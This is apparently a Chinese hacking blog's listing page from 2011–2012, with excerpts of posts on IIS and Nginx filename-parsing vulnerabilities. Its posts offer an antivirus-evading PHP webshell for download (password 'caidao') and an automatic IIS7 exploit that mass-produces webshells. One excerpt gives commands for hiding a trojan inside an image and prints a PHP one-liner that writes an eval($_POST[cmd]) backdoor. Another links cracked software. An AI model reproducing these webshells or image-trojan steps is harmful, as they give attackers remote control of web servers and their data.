Zend加密 免杀PHP一句话藐视所有IIS防御软件

分类:工具 | 2012-04-27 | 撸过 984 次
1人扯谈

话不多 直接截图。。。 抓紧下!

PHP一句话密码:caidao

 

下载地址:caidao

网盘下载:caidao.zip

文件大小:1 KB

高危IIS6.0 文件名解析漏洞 终极解决办法!

分类:技术 | 2012-03-5 | 撸过 769 次
0人扯谈

我之前就发现这个漏洞,我也无奈,后来我想到了rewrite这个东西,它可以用正则表达式匹配URL进行处理。

http://webshell.cc/dir.asp/diy.jpg

比如这就是个diy.asp被更改成图片的文件

IIS6.0的漏洞可以运行它。

我的解决办法:

我在

https://webshell.cc/

下弄了个图片,上面写的警告信息

https://webshell.cc/no.jpg

我在IIS6.0中安装了Rewrite这个ISAPI

下载ISAPIrewrite破解版 点击下载此文件

安装之后把Cracked里的ISAPI_Rewrite.dll,替换掉[......]

继续阅读

IIS7.0畸形解析0day

分类:安全 | 2012-01-18 | 撸过 429 次
0人扯谈

先合并一张PHP一句话图片马,合并方法:

①、DOS合并:copy 1.gif /b + 1.txt/a asp.gif

②、用edjpgcom,进行图片和一句话木马的合并,

图片随便找一张.

【顺带着说一下edjpgcom的使用方法:打开edjpgcom.exe所在文件夹,然后把你所要修改的图片拖动到

edjpgcom.exe上面,然后edjpgcom.exe会自动打开,写入想要些的代码即可】

一句话:

<?PHP fputs(fopen(’shell.php’,’w’),’<?php eval($_POST[cmd])?>’);?>

然后找个ngin[......]

继续阅读

IIS注册表全版本泄漏用户路径和FTP用户名漏洞

分类:安全 | 2011-10-2 | 撸过 458 次
0人扯谈

 此洞由FAKER AND 啊迪明发现!并做测试!

 

标题蛮长的!哈哈~

 

这个漏洞貌似鸡肋,但是也有强大的用处。但是懂得怎么利用他,完全靠得自己,我只是给一个小小思路。

 

进入主题!

 

重要注册表:

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\MSFtpsvc\Parameters\Virtual Roots\

ControlSet002这个目录可以是ControlSet001 ControlSet003

 

注明:不是用第三方软件分配出来的ftp用户[......]

继续阅读

IIS7.0畸形解析漏洞通杀0day

分类:安全 | 2011-10-1 | 撸过 942 次
0人扯谈

IIS7.0畸形解析0day通杀漏洞,和Nginx上次的0day一样。使用iis7.0的注意了。临时解决办法:关闭cgi.fix_pathinfo为0
Nginx好像又爆0day了,windows下可任意查看和下载脚本文件 王猛 IIS7.0畸形解析0day通杀漏洞,和Nginx上次的0day一样。使用iis7.0的注意了。

临时解决办法:关闭cgi.fix_pathinfo为0

__________________________________

先说一下Nginx那个0day(出来有几天了,因为介绍的网站很多,所以当时就没转载)
先合并一张PHP一句话图片马,合并方法:
①、DO[......]

继续阅读

iis7重大漏洞 自动批量生产webshell!~

分类:安全 | 2011-09-14 | 撸过 2,430 次
1人扯谈

Automatic iis7 parsing vulnerability exploit

我就不在多说什么了! 直接上图:

 

下载:Automatic iis7.0 exploit